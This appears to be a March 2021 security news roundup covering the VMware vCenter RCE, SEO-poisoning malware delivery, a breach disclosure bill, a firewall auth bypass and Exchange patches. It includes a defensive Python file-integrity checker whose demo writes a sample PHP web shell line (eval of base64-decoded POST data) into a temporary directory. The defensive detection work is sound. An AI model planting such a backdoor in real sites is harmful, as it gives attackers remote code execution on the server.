Security Wrap-Up (March 2nd, 2021)

Welcome back to the Security Wrap-Up! Last week was somewhat eventful, with a fairly hefty VMware vulnerability. Let’s check it out -

VMware servers exposed to critical RCE bug
Although this was mentioned in a thread last week, I thought it was worth discussing here as well. VMware has patched three vulnerabilities in its virtual-machine infrastructure for data centers, the most serious of which is a remote code execution (RCE) flaw in its vCenter Server management platform. The vulnerability could allow attackers to breach an enterprise data center from the outside, or to use a foothold or backdoor already inside the network to pivot to vCenter and take over the systems it manages. The most critical of the flaws, tracked as CVE-2021-21972, was found in the vRealize Operations (vROps) plugin of the vSphere Client, according to an advisory VMware posted on Tuesday. Note that the plugin is present in default vCenter installations, so the vulnerable code is reachable whether or not vROps itself is deployed. VMware has advised customers to install the updates on all affected deployments, and has also published workarounds for those who can't update immediately. Either way, this is a good moment to check that the vSphere Client is not reachable from the internet and is exposed only to a dedicated management network.

Hackers exploit websites to boost SEO before deploying malware
Cyberattackers have turned to search engine optimization (SEO) techniques to deliver malware payloads to as many victims as possible. According to Sophos, the so-called search engine "deoptimization" method combines SEO tricks with the abuse of human psychology: compromised websites are pushed up Google's rankings so that people searching for ordinary topics land on them and are lured into downloading the payload. To do this, the attackers tamper with the content management systems (CMS) of legitimate but compromised websites so that visitors arriving from a search are served financial malware, exploit tools, and ransomware.
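Since the campaign above works by tampering with a site's CMS files, the practical check on the defender's side is a file-integrity baseline: hash every file in the document root while the site is known-good, then re-scan and alert on anything added, removed or changed. The Python below is an added example written for this wrap-up (it is not code from Sophos or from the original post); the upload-directory names and the rule that server-side scripts never belong in a media directory are assumptions for the example, and the "compromised" site is a constructed temporary directory rather than real data.

```python
"""Baseline-and-diff integrity check for a CMS document root.

Added example for the Security Wrap-Up (not from Sophos or the original post).
The attack described above alters CMS files on a legitimate site; the defence
is to know what the files looked like before and to alert on any change.
"""
from __future__ import annotations

import hashlib
import os
import tempfile
from pathlib import Path

# Heuristic (an assumption for this example): server-side scripts have no
# business inside directories that should only hold uploaded media.
SUSPICIOUS_EXTS = {".php", ".phtml", ".php5", ".phar"}
UPLOAD_DIRS = ("wp-content/uploads", "media", "uploads")


def sha256_file(path: Path) -> str:
    """Stream a file through SHA-256 so large media files don't fill memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: Path) -> dict[str, str]:
    """Map every file under root (relative POSIX path) to its SHA-256 digest."""
    return {
        p.relative_to(root).as_posix(): sha256_file(p)
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def diff_manifest(baseline: dict[str, str],
                  current: dict[str, str]) -> dict[str, list[str]]:
    """Compare a known-good manifest against a fresh scan of the same tree."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in set(baseline) & set(current)
                      if baseline[p] != current[p])
    # A brand-new script inside a media directory is the classic footprint of
    # a planted web shell or injected SEO/redirect code.
    webshell_candidates = [
        p for p in added
        if Path(p).suffix.lower() in SUSPICIOUS_EXTS
        and any(p.startswith(d + "/") for d in UPLOAD_DIRS)
    ]
    return {"added": added, "removed": removed, "modified": modified,
            "webshell_candidates": webshell_candidates}


def demo() -> dict[str, list[str]]:
    """Constructed scenario: baseline a clean site, then simulate CMS tampering."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "wp-content" / "uploads").mkdir(parents=True)
        (root / "index.php").write_text("<?php require 'wp-blog-header.php';\n")
        (root / "wp-content" / "uploads" / "logo.png").write_bytes(b"\x89PNG\r\n")
        baseline = build_manifest(root)  # taken while the site is known-good

        # Tampering of the kind described above (constructed sample content):
        # the CMS entry point is altered to pull in attacker code, and a
        # backdoor script is dropped where only images should live.
        (root / "index.php").write_text(
            "<?php include 'wp-content/uploads/cache.php'; "
            "require 'wp-blog-header.php';\n")
        (root / "wp-content" / "uploads" / "cache.php").write_text(
            "<?php eval(base64_decode($_POST['c']));\n")
        return diff_manifest(baseline, build_manifest(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

In practice the baseline manifest is written to a file (or a remote store the web server cannot write to) right after a clean deploy, and the re-scan runs from cron; a CMS update legitimately changes core files, so re-baseline as part of the update procedure rather than teaching yourself to ignore the alerts.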

Bipartisan lawmakers announce breach disclosure bill
At a joint hearing of the House Oversight and Homeland Security Committees about the SolarWinds-related espionage campaign, Rep. Michael McCaul (R-TX) said that he and Rep. Jim Langevin (D-RI) are working on legislation that would require companies to notify the federal government after similar breaches. While McCaul offered no further detail on what the proposal would look like, much of Friday's hearing was devoted to how such a law might work.

Firewall vendor patches critical auth bypass flaw
Cybersecurity firm Genua has fixed a critical flaw in its GenuGate High Resistance Firewall that allowed attackers to log in as root. An attacker able to reach the firewall's login interface could bypass authentication and obtain the highest level of privileges on a device that sits between the internet and the internal company network. The researchers reported the vulnerability to Genua on Jan. 29th; the vendor confirmed the issue the same day and released a patch for the affected product on Feb. 2nd. Given that the device in question is a perimeter firewall, anyone running GenuGate who hasn't yet applied the February update should treat it as urgent.

And in the few hours since I started drafting this, another big piece of security news has come through. Microsoft has released patches for four critical vulnerabilities that are being actively exploited against on-premises versions of Microsoft Exchange Server. Microsoft is urging customers to patch ASAP: https://www.darkreading.com/threat-intelligence/microsoft-urges-businesses-to-patch-critical-exchange-server-flaws/d/d-id/1340305 Because these flaws were already being exploited when the patches shipped, patching alone isn't the end of it; anyone running on-premises Exchange should also check their servers for signs of compromise.